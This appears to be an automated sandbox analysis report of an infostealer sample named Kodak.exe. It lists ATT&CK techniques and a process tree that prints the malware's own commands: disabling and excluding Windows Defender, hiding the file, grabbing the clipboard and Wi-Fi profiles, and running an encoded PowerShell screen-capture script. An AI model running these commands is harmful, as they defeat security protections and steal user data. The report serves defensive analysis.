886bef3e6f5c4b49c18f71bf88bbb5f1c5ab6addab24d4a8b59b13dbb0c28d7e

Analysis

max time kernel
124s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-11-2024 03:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Kodak.exe
Size

21.0MB
MD5

91d4be68d8832004ca15d8e6d0114b22
SHA1

138544d3e164698c6197be77fc228842c4dd7143
SHA256

30a19bb2be93115840fc77eeb6390d2a6f6ab9d5c1fd6d35a7914e7593f2c457
SHA512

3522355944dfdb944d7bef6373316ce729b22b025ebad4ac562d5de8012b6ad7a0bc6de85f284e69d4993363a4bcedac75def455692d1c27140825920397ccfb
SSDEEP

98304:PwvkwN+MdA5wqSnWn8MMhJMjarJaon7JPzf+JiUCS3swhzqgez7DovaDJ1n6hB0F:PCV1vHB6ylnlPzf+JiJCsmFMvln6hqgE

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1756	powershell.exe
3656	powershell.exe
3772	powershell.exe
4308	powershell.exe
4804	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2804	cmd.exe
2520	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2352	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe
756	Kodak.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
41	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
4336	tasklist.exe
436	tasklist.exe
232	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3152	cmd.exe

UPX packed file 62 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023c77-21.dat	upx
behavioral1/memory/756-25-0x00007FF98C400000-0x00007FF98C9EA000-memory.dmp	upx
behavioral1/files/0x0007000000023c6a-27.dat	upx
behavioral1/memory/756-48-0x00007FF9A3590000-0x00007FF9A359F000-memory.dmp	upx
behavioral1/files/0x0007000000023c75-30.dat	upx
behavioral1/memory/756-47-0x00007FF99C170000-0x00007FF99C193000-memory.dmp	upx
behavioral1/files/0x0007000000023c71-46.dat	upx
behavioral1/files/0x0007000000023c70-45.dat	upx
behavioral1/files/0x0007000000023c6f-44.dat	upx
behavioral1/files/0x0007000000023c6e-43.dat	upx
behavioral1/files/0x0007000000023c6d-42.dat	upx
behavioral1/files/0x0007000000023c6c-41.dat	upx
behavioral1/files/0x0007000000023c6b-40.dat	upx
behavioral1/files/0x0007000000023c69-39.dat	upx
behavioral1/files/0x0007000000023c7d-38.dat	upx
behavioral1/files/0x0007000000023c7c-37.dat	upx
behavioral1/files/0x0007000000023c7b-36.dat	upx
behavioral1/files/0x0007000000023c76-33.dat	upx
behavioral1/files/0x0007000000023c74-32.dat	upx
behavioral1/memory/756-54-0x00007FF99BEB0000-0x00007FF99BEDD000-memory.dmp	upx
behavioral1/memory/756-56-0x00007FF99BD50000-0x00007FF99BD69000-memory.dmp	upx
behavioral1/memory/756-58-0x00007FF99BD20000-0x00007FF99BD43000-memory.dmp	upx
behavioral1/memory/756-60-0x00007FF98C400000-0x00007FF98C9EA000-memory.dmp	upx
behavioral1/memory/756-61-0x00007FF98B450000-0x00007FF98B5BF000-memory.dmp	upx
behavioral1/memory/756-63-0x00007FF99B7B0000-0x00007FF99B7C9000-memory.dmp	upx
behavioral1/memory/756-65-0x00007FF9A16E0000-0x00007FF9A16ED000-memory.dmp	upx
behavioral1/memory/756-68-0x00007FF99B780000-0x00007FF99B7AE000-memory.dmp	upx
behavioral1/memory/756-67-0x00007FF99C170000-0x00007FF99C193000-memory.dmp	upx
behavioral1/memory/756-70-0x00007FF99B6C0000-0x00007FF99B778000-memory.dmp	upx
behavioral1/memory/756-73-0x00007FF98B0D0000-0x00007FF98B445000-memory.dmp	upx
behavioral1/memory/756-78-0x00007FF99C140000-0x00007FF99C14D000-memory.dmp	upx
behavioral1/memory/756-76-0x00007FF99B6A0000-0x00007FF99B6B4000-memory.dmp	upx
behavioral1/memory/756-79-0x00007FF99BD20000-0x00007FF99BD43000-memory.dmp	upx
behavioral1/memory/756-83-0x00007FF98B450000-0x00007FF98B5BF000-memory.dmp	upx
behavioral1/memory/756-84-0x00007FF98AE00000-0x00007FF98AF1C000-memory.dmp	upx
behavioral1/memory/756-85-0x00007FF99B7B0000-0x00007FF99B7C9000-memory.dmp	upx
behavioral1/memory/756-124-0x00007FF98C400000-0x00007FF98C9EA000-memory.dmp	upx
behavioral1/memory/756-139-0x00007FF98AE00000-0x00007FF98AF1C000-memory.dmp	upx
behavioral1/memory/756-135-0x00007FF99B6C0000-0x00007FF99B778000-memory.dmp	upx
behavioral1/memory/756-134-0x00007FF99B780000-0x00007FF99B7AE000-memory.dmp	upx
behavioral1/memory/756-136-0x00007FF98B0D0000-0x00007FF98B445000-memory.dmp	upx
behavioral1/memory/756-125-0x00007FF99C170000-0x00007FF99C193000-memory.dmp	upx
behavioral1/memory/756-187-0x00007FF98C400000-0x00007FF98C9EA000-memory.dmp	upx
behavioral1/memory/756-236-0x00007FF98C400000-0x00007FF98C9EA000-memory.dmp	upx
behavioral1/memory/756-323-0x00007FF99C170000-0x00007FF99C193000-memory.dmp	upx
behavioral1/memory/756-328-0x00007FF98B450000-0x00007FF98B5BF000-memory.dmp	upx
behavioral1/memory/756-322-0x00007FF98C400000-0x00007FF98C9EA000-memory.dmp	upx
behavioral1/memory/756-388-0x00007FF99C170000-0x00007FF99C193000-memory.dmp	upx
behavioral1/memory/756-387-0x00007FF9A3590000-0x00007FF9A359F000-memory.dmp	upx
behavioral1/memory/756-389-0x00007FF98C400000-0x00007FF98C9EA000-memory.dmp	upx
behavioral1/memory/756-392-0x00007FF99BD20000-0x00007FF99BD43000-memory.dmp	upx
behavioral1/memory/756-396-0x00007FF99B780000-0x00007FF99B7AE000-memory.dmp	upx
behavioral1/memory/756-397-0x00007FF99B6C0000-0x00007FF99B778000-memory.dmp	upx
behavioral1/memory/756-395-0x00007FF9A16E0000-0x00007FF9A16ED000-memory.dmp	upx
behavioral1/memory/756-394-0x00007FF99B7B0000-0x00007FF99B7C9000-memory.dmp	upx
behavioral1/memory/756-393-0x00007FF98B450000-0x00007FF98B5BF000-memory.dmp	upx
behavioral1/memory/756-390-0x00007FF99BEB0000-0x00007FF99BEDD000-memory.dmp	upx
behavioral1/memory/756-391-0x00007FF99BD50000-0x00007FF99BD69000-memory.dmp	upx
behavioral1/memory/756-401-0x00007FF98AE00000-0x00007FF98AF1C000-memory.dmp	upx
behavioral1/memory/756-399-0x00007FF99B6A0000-0x00007FF99B6B4000-memory.dmp	upx
behavioral1/memory/756-400-0x00007FF99C140000-0x00007FF99C14D000-memory.dmp	upx
behavioral1/memory/756-398-0x00007FF98B0D0000-0x00007FF98B445000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2388	cmd.exe
984	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4360	netsh.exe
4320	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2224	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2756	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
984	PING.EXE

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
1756	powershell.exe
1756	powershell.exe
4076	powershell.exe
4076	powershell.exe
4308	powershell.exe
4308	powershell.exe
4804	powershell.exe
4804	powershell.exe
2520	powershell.exe
2520	powershell.exe
4076	powershell.exe
2520	powershell.exe
1756	powershell.exe
4804	powershell.exe
4308	powershell.exe
3656	powershell.exe
3656	powershell.exe
3656	powershell.exe
3212	powershell.exe
3212	powershell.exe
3212	powershell.exe
3772	powershell.exe
3772	powershell.exe
3772	powershell.exe
3304	powershell.exe
3304	powershell.exe
3304	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4336	tasklist.exe
Token: SeDebugPrivilege	436	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3788	WMIC.exe
Token: SeSecurityPrivilege	3788	WMIC.exe
Token: SeTakeOwnershipPrivilege	3788	WMIC.exe
Token: SeLoadDriverPrivilege	3788	WMIC.exe
Token: SeSystemProfilePrivilege	3788	WMIC.exe
Token: SeSystemtimePrivilege	3788	WMIC.exe
Token: SeProfSingleProcessPrivilege	3788	WMIC.exe
Token: SeIncBasePriorityPrivilege	3788	WMIC.exe
Token: SeCreatePagefilePrivilege	3788	WMIC.exe
Token: SeBackupPrivilege	3788	WMIC.exe
Token: SeRestorePrivilege	3788	WMIC.exe
Token: SeShutdownPrivilege	3788	WMIC.exe
Token: SeDebugPrivilege	3788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3788	WMIC.exe
Token: SeRemoteShutdownPrivilege	3788	WMIC.exe
Token: SeUndockPrivilege	3788	WMIC.exe
Token: SeManageVolumePrivilege	3788	WMIC.exe
Token: 33	3788	WMIC.exe
Token: 34	3788	WMIC.exe
Token: 35	3788	WMIC.exe
Token: 36	3788	WMIC.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	232	tasklist.exe
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeIncreaseQuotaPrivilege	3788	WMIC.exe
Token: SeSecurityPrivilege	3788	WMIC.exe
Token: SeTakeOwnershipPrivilege	3788	WMIC.exe
Token: SeLoadDriverPrivilege	3788	WMIC.exe
Token: SeSystemProfilePrivilege	3788	WMIC.exe
Token: SeSystemtimePrivilege	3788	WMIC.exe
Token: SeProfSingleProcessPrivilege	3788	WMIC.exe
Token: SeIncBasePriorityPrivilege	3788	WMIC.exe
Token: SeCreatePagefilePrivilege	3788	WMIC.exe
Token: SeBackupPrivilege	3788	WMIC.exe
Token: SeRestorePrivilege	3788	WMIC.exe
Token: SeShutdownPrivilege	3788	WMIC.exe
Token: SeDebugPrivilege	3788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3788	WMIC.exe
Token: SeRemoteShutdownPrivilege	3788	WMIC.exe
Token: SeUndockPrivilege	3788	WMIC.exe
Token: SeManageVolumePrivilege	3788	WMIC.exe
Token: 33	3788	WMIC.exe
Token: 34	3788	WMIC.exe
Token: 35	3788	WMIC.exe
Token: 36	3788	WMIC.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeIncreaseQuotaPrivilege	4052	WMIC.exe
Token: SeSecurityPrivilege	4052	WMIC.exe
Token: SeTakeOwnershipPrivilege	4052	WMIC.exe
Token: SeLoadDriverPrivilege	4052	WMIC.exe
Token: SeSystemProfilePrivilege	4052	WMIC.exe
Token: SeSystemtimePrivilege	4052	WMIC.exe
Token: SeProfSingleProcessPrivilege	4052	WMIC.exe
Token: SeIncBasePriorityPrivilege	4052	WMIC.exe
Token: SeCreatePagefilePrivilege	4052	WMIC.exe
Token: SeBackupPrivilege	4052	WMIC.exe
Token: SeRestorePrivilege	4052	WMIC.exe
Token: SeShutdownPrivilege	4052	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1020 wrote to memory of 756	1020	Kodak.exe	85
PID 1020 wrote to memory of 756	1020	Kodak.exe	85
PID 756 wrote to memory of 2532	756	Kodak.exe	86
PID 756 wrote to memory of 2532	756	Kodak.exe	86
PID 756 wrote to memory of 4188	756	Kodak.exe	87
PID 756 wrote to memory of 4188	756	Kodak.exe	87
PID 756 wrote to memory of 3264	756	Kodak.exe	88
PID 756 wrote to memory of 3264	756	Kodak.exe	88
PID 756 wrote to memory of 3152	756	Kodak.exe	89
PID 756 wrote to memory of 3152	756	Kodak.exe	89
PID 756 wrote to memory of 1328	756	Kodak.exe	94
PID 756 wrote to memory of 1328	756	Kodak.exe	94
PID 756 wrote to memory of 5088	756	Kodak.exe	96
PID 756 wrote to memory of 5088	756	Kodak.exe	96
PID 756 wrote to memory of 3732	756	Kodak.exe	97
PID 756 wrote to memory of 3732	756	Kodak.exe	97
PID 756 wrote to memory of 3748	756	Kodak.exe	100
PID 756 wrote to memory of 3748	756	Kodak.exe	100
PID 756 wrote to memory of 2804	756	Kodak.exe	102
PID 756 wrote to memory of 2804	756	Kodak.exe	102
PID 756 wrote to memory of 4836	756	Kodak.exe	104
PID 756 wrote to memory of 4836	756	Kodak.exe	104
PID 756 wrote to memory of 444	756	Kodak.exe	106
PID 756 wrote to memory of 444	756	Kodak.exe	106
PID 756 wrote to memory of 4320	756	Kodak.exe	107
PID 756 wrote to memory of 4320	756	Kodak.exe	107
PID 756 wrote to memory of 3100	756	Kodak.exe	110
PID 756 wrote to memory of 3100	756	Kodak.exe	110
PID 756 wrote to memory of 2264	756	Kodak.exe	112
PID 756 wrote to memory of 2264	756	Kodak.exe	112
PID 5088 wrote to memory of 4336	5088	cmd.exe	114
PID 5088 wrote to memory of 4336	5088	cmd.exe	114
PID 3732 wrote to memory of 436	3732	cmd.exe	115
PID 3732 wrote to memory of 436	3732	cmd.exe	115
PID 3152 wrote to memory of 4200	3152	cmd.exe	116
PID 3152 wrote to memory of 4200	3152	cmd.exe	116
PID 2532 wrote to memory of 4308	2532	cmd.exe	118
PID 2532 wrote to memory of 4308	2532	cmd.exe	118
PID 4320 wrote to memory of 4360	4320	cmd.exe	119
PID 4320 wrote to memory of 4360	4320	cmd.exe	119
PID 3264 wrote to memory of 3520	3264	cmd.exe	120
PID 3264 wrote to memory of 3520	3264	cmd.exe	120
PID 4188 wrote to memory of 1756	4188	cmd.exe	117
PID 4188 wrote to memory of 1756	4188	cmd.exe	117
PID 2804 wrote to memory of 2520	2804	cmd.exe	121
PID 2804 wrote to memory of 2520	2804	cmd.exe	121
PID 3748 wrote to memory of 3788	3748	cmd.exe	122
PID 3748 wrote to memory of 3788	3748	cmd.exe	122
PID 444 wrote to memory of 3772	444	cmd.exe	123
PID 444 wrote to memory of 3772	444	cmd.exe	123
PID 1328 wrote to memory of 4804	1328	cmd.exe	125
PID 1328 wrote to memory of 4804	1328	cmd.exe	125
PID 3100 wrote to memory of 2756	3100	cmd.exe	126
PID 3100 wrote to memory of 2756	3100	cmd.exe	126
PID 4836 wrote to memory of 232	4836	cmd.exe	127
PID 4836 wrote to memory of 232	4836	cmd.exe	127
PID 2264 wrote to memory of 4076	2264	cmd.exe	128
PID 2264 wrote to memory of 4076	2264	cmd.exe	128
PID 756 wrote to memory of 2960	756	Kodak.exe	130
PID 756 wrote to memory of 2960	756	Kodak.exe	130
PID 2960 wrote to memory of 2484	2960	cmd.exe	132
PID 2960 wrote to memory of 2484	2960	cmd.exe	132
PID 756 wrote to memory of 4124	756	Kodak.exe	134
PID 756 wrote to memory of 4124	756	Kodak.exe	134

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4200	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Kodak.exe
"C:\Users\Admin\AppData\Local\Temp\Kodak.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1020
- C:\Users\Admin\AppData\Local\Temp\Kodak.exe
  "C:\Users\Admin\AppData\Local\Temp\Kodak.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Kodak.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2532
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Kodak.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4188
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please Restart ', 0, 'File Erro Dx1Gv', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3264
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please Restart ', 0, 'File Erro Dx1Gv', 0+16);close()"
      4⤵
      PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Kodak.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3152
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Kodak.exe"
      4⤵
      Views/modifies file attributes
      PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏  ‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏  ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5088
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3732
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3748
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4836
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:444
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4320
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3100
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAa